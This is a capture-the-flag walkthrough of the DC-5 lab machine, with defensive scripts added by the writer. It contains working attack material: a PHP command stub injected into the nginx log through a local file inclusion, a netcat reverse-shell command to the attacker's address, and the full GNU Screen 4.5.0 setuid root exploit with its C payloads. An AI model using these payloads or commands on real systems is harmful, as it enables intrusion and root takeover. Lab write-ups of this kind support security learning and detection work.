Host discovery
Using netdiscover, the target host is found at 192.168.203.130.
Port scanning
Using Nmap (the default scan covers the 1000 most common ports; --script=vuln additionally runs the NSE vulnerability scripts against every open port it finds):
root@kali:~# nmap -sV -A 192.168.203.130 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 09:58 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.130
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.130
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.130:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.6.2
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34063/udp status
| 100024 1 40695/tcp status
| 100024 1 45211/udp6 status
|_ 100024 1 51852/tcp6 status
MAC Address: 00:0C:29:02:DC:93 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.203.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.29 seconds
In this default scan Nmap only found ports 80 and 111 open. Note that the rpcinfo output already lists the high ports that rpc.statd (program 100024, "status") is bound to, including 40695/tcp; that becomes relevant below.
Looking for the flag
Let's start with the web service on port 80. It is a plain website with no identifiable CMS, so let's try a directory scan.
Directory scanning
Using dirb, which ships with Kali:
root@kali:~/桌面# dirb http://192.168.203.130/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Feb 14 10:07:48 2020
URL_BASE: http://192.168.203.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.203.130/ ----
==> DIRECTORY: http://192.168.203.130/css/
==> DIRECTORY: http://192.168.203.130/images/
+ http://192.168.203.130/index.php (CODE:200|SIZE:4025)
---- Entering directory: http://192.168.203.130/css/ ----
---- Entering directory: http://192.168.203.130/images/ ----
-----------------
END_TIME: Fri Feb 14 10:07:56 2020
DOWNLOADED: 13836 - FOUND: 1
Nothing of interest turns up.
Back to the site itself: the only interactive part is the Contact section, where we can submit some content. Even so, there does not seem to be anything to exploit there.
Following the usual CTF reasoning: this is a Linux box, so it should have port 22 open, but it doesn't. Maybe SSH was moved to another port, so I scanned the full port range again:
nmap -sV -p 1-65535 192.168.203.130
Sure enough, one more port shows up: 40695. Trying to connect to it with telnet gave nothing, though, and the trail went cold.
(In hindsight, 40695 was never going to be a relocated SSH: the rpcinfo output from the first scan already lists 40695/tcp as the rpc.statd "status" service, which is why the telnet connection stays silent. Checking a surprise high port against rpcinfo first saves the detour.)
After looking at a hint from a more experienced player, the problem is indeed in the web application, in that submission page. After we submit the form we are redirected to thankyou.php, and every time that page is refreshed the Copyright line at the bottom changes. Why would that happen?
File inclusion vulnerability
A bit of background on footer.php: anyone who has built a site knows that footer.php renders the page footer, the copyright notice and other site information at the bottom of every page, so there is usually a footer.php in the web root. Let's request it directly:
It does exist, and the number changes on every refresh. That explains the behaviour: thankyou.php includes a file named by a request parameter, and includes footer.php when none is given. Next, confirm the vulnerability by including /etc/passwd:
http://192.168.203.130/thankyou.php?file=/etc/passwd
The file is included successfully.
Exploiting the vulnerability
A Chrome extension identifies the web server as nginx (the nmap output already reported nginx 1.6.2). With that we can abuse nginx's access log: nginx writes the request line and the User-Agent header of every request into the log verbatim, so whatever we send ends up in /var/log/nginx/access.log, and including that file through the LFI executes any PHP it contains. Two caveats: the payload must travel in a header such as User-Agent rather than in the URL, because the client percent-encodes < and ? in a URL and the logged request line would not be valid PHP; and the trick only works if the log is readable by the PHP worker, which is the case on this box.
I first inject a phpinfo() to check that it works:
<?php phpinfo();?>
It runs. Next inject a command-execution stub:
<?php system($_GET['cmd']);?>
With a netcat listener waiting on port 7777 on the attacking machine (192.168.203.129), the command to run on the target is a reverse shell:
nc 192.168.203.129 7777 -e /bin/bash
Request it directly in the URL (a browser encodes the spaces for you; with curl, write them as %20):
http://192.168.203.130/thankyou.php?file=/var/log/nginx/access.log&cmd=nc 192.168.203.129 7777 -e /bin/bash
and the reverse shell comes back.
Looking at the web root and cat'ing footer.php confirms what I expected: it is the file that thankyou.php includes by default.
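Seen from the defender's side, the whole chain leaves traces in the same access.log it abused. Here is an added example of mine (not from the write-up) that runs a few detection rules over constructed log lines modelled on this attack: a PHP tag in a logged header, an absolute path or traversal in an include parameter, the log file itself being included, and a shell command in the query string. The sample lines are constructed for the example and follow nginx's default combined format.

```python
#!/usr/bin/env python3
"""Detection rules for LFI and log-poisoning traces in nginx access.log
(added example; the sample lines below are constructed, not from the box)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# nginx 'combined' format: ip - user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: a normal hit, the default include, the /etc/passwd
# probe, the poisoning request (stub in User-Agent), and the log include
# that launches the reverse shell.
SAMPLE_LOG = """\
192.168.203.129 - - [14/Feb/2020:22:10:01 +0800] "GET /index.php HTTP/1.1" 200 4025 "-" "Mozilla/5.0"
192.168.203.129 - - [14/Feb/2020:22:11:13 +0800] "GET /thankyou.php?file=footer.php HTTP/1.1" 200 1230 "-" "Mozilla/5.0"
192.168.203.129 - - [14/Feb/2020:22:12:40 +0800] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 1640 "-" "Mozilla/5.0"
192.168.203.129 - - [14/Feb/2020:22:13:02 +0800] "GET / HTTP/1.1" 200 4025 "-" "<?php system($_GET['cmd']);?>"
192.168.203.129 - - [14/Feb/2020:22:13:30 +0800] "GET /thankyou.php?file=/var/log/nginx/access.log&cmd=nc%20192.168.203.129%207777%20-e%20/bin/bash HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
"""

SHELL_HINTS = ("/bin/sh", "/bin/bash", "nc ", "bash -i", "/dev/tcp/")


def classify(line):
    """Rule names the line triggers: [] for benign, ['unparsed'] if the
    line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    e = m.groupdict()
    hits = []
    # 1. PHP opening tag in anything the client controls. The request line
    #    is logged as sent, so check its percent-decoded form as well.
    for field in ("req", "ref", "ua"):
        if "<?" in e[field] or "<?" in unquote(e[field]):
            hits.append("php-tag-in-" + field)
    parts = e["req"].split(" ")
    if len(parts) < 2:
        return hits
    for name, values in parse_qs(urlsplit(parts[1]).query).items():
        for v in values:
            # 2. Parameter pointing at an absolute path, traversal or wrapper.
            if v.startswith("/") or "../" in v or v.startswith("php://"):
                hits.append(f"lfi:{name}={v}")
            # 3. The log (or /proc) itself being included: poisoning trigger.
            if "/var/log" in v or v.startswith("/proc/"):
                hits.append(f"log-include:{name}")
            # 4. Something that looks like a shell command in the query.
            if any(h in v for h in SHELL_HINTS):
                hits.append(f"shell-in-query:{name}")
    return hits


def analyze(lines):
    """Map line index -> rule hits, for every non-empty line."""
    return {i: classify(l) for i, l in enumerate(lines) if l.strip()}


if __name__ == "__main__":
    for i, hits in analyze(SAMPLE_LOG.splitlines()).items():
        if hits:
            print(f"line {i + 1}: {', '.join(hits)}")
```

The php-tag rule fires on the poisoning request itself, before anything has been executed, which is the alert worth paging on; the log-include rule catches the trigger even if the poisoned line was written weeks earlier.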
Privilege escalation
find / -user root -perm -4000 -print 2>/dev/null
Among the setuid-root binaries this turns up screen, a setuid-root copy of GNU Screen.
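The same enumeration in script form, added here as an example of mine rather than part of the write-up: it reproduces the find test (regular file, setuid bit, owner root), compares the result against a baseline, and when a screen binary is among the leftovers parses its version string, since the bug the exploit below relies on (CVE-2017-5618, screen opening its -L logfile with root privileges) exists in 4.5.0 and was fixed in 4.5.1. The EXPECTED allowlist is a short illustrative one I chose, not an authoritative baseline, and the 4.05.00 version string is what screen 4.5.0 prints for screen -v.

```python
#!/usr/bin/env python3
"""Setuid-root audit plus GNU Screen version check (added example, not
from the write-up). EXPECTED is an illustrative allowlist, not a baseline
to trust blindly."""
import os
import re
import stat
import subprocess

# Setuid-root binaries one expects on a minimal Debian-style install.
EXPECTED = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

# Pseudo filesystems: nothing to audit there, and walking /proc is slow.
SKIP = ("/proc", "/sys", "/dev", "/run")


def is_setuid_root(mode, uid):
    """Same test as `find / -user root -perm -4000`: a regular file with the
    setuid bit set, owned by uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def find_setuid_root(root="/"):
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in SKIP:
            dirnames[:] = []  # prune, do not descend
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if is_setuid_root(st.st_mode, st.st_uid):
                hits.append(path)
    return sorted(hits)


def unexpected(paths):
    """Setuid-root files missing from the baseline: the ones to look at."""
    return sorted(p for p in paths if p not in EXPECTED)


VERSION_RE = re.compile(r"Screen version (\d+)\.(\d+)\.(\d+)")


def parse_screen_version(text):
    """`screen -v` prints e.g. 'Screen version 4.05.00 (GNU) 10-Dec-16'."""
    m = VERSION_RE.search(text)
    return None if m is None else tuple(int(x) for x in m.groups())


def has_logfile_bug(version):
    """CVE-2017-5618: screen 4.5.0 opens the -L logfile as root before
    dropping privileges; fixed in 4.5.1."""
    return version == (4, 5, 0)


if __name__ == "__main__":
    for p in unexpected(find_setuid_root()):
        print("unexpected setuid-root:", p)
        if os.path.basename(p) == "screen":
            out = subprocess.run([p, "-v"], capture_output=True, text=True).stdout
            v = parse_screen_version(out)
            print("  screen version", v, "logfile bug:", has_logfile_bug(v))
```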
Looking it up with searchsploit, the one to read is 41154.sh:
root@kali:~# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
Following the script, save this as libhax.c (with the #include <sys/stat.h> that chown/chmod need):
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
and this as rootshell.c (with #include <unistd.h> for the setuid family, and a proper argv for execvp, which takes two arguments, not the three in the published script):
#include <stdio.h>
#include <unistd.h>
int main(void){
    char *const argv[] = {"/bin/sh", NULL};
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", argv);
    return 1;
}
Then compile both on the attacking machine, as the script does, and transfer the resulting binaries:
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
Serve them over HTTP from the attacking machine on port 8080 and use wget on the target to drop both into /tmp. They must land there: libhax.so has /tmp/rootshell hard-coded, and the ld.so.preload entry written below points at /tmp/libhax.so.
www-data@dc-5:/tmp$ wget 192.168.203.129:8080/libhax.so
converted 'http://192.168.203.129:8080/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/libhax.so' (UTF-8)
--2020-02-14 22:25:48-- http://192.168.203.129:8080/libhax.so
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'
libhax.so 100%[=====================>] 15.77K --.-KB/s in 0s
2020-02-14 22:25:48 (531 MB/s) - 'libhax.so' saved [16144/16144]
-----------------------------------------------------------------------------------
www-data@dc-5:/tmp$ wget http://192.168.203.129:8080/rootshell
converted 'http://192.168.203.129:8080/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.203.129:8080/rootshell' (UTF-8)
--2020-02-14 22:24:42-- http://192.168.203.129:8080/rootshell
Connecting to 192.168.203.129:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'
rootshell 100%[=====================>] 16.44K --.-KB/s in 0s
Then run the remaining commands from the script on the target:
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
What happens here: setuid screen 4.5.0 opens its -L logfile with root privileges, so -L ld.so.preload creates /etc/ld.so.preload (world-writable thanks to umask 000) and the logged output of the echo puts /tmp/libhax.so on a line of its own in that file. The next setuid invocation, screen -ls, runs as root with libhax.so preloaded; its constructor makes /tmp/rootshell setuid root and removes the preload file again (the "cannot be preloaded" warning is the loader complaining about the garbage on the first line, which is harmless). Finally go back to /tmp and run rootshell to get a root shell.
www-data@dc-5:/tmp$ cd /etc
www-data@dc-5:/etc$ umask 000
www-data@dc-5:/etc$ screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
www-data@dc-5:/etc$ echo "[+] Triggering..."
[+] Triggering...
www-data@dc-5:/etc$ screen -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
www-data@dc-5:/etc$ cd /tmp
www-data@dc-5:/tmp$ ./rootshell
# whoami
root
#
-------------------------------------------------------------------------------
# cd /root
# ls
thisistheflag.txt
# cat thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.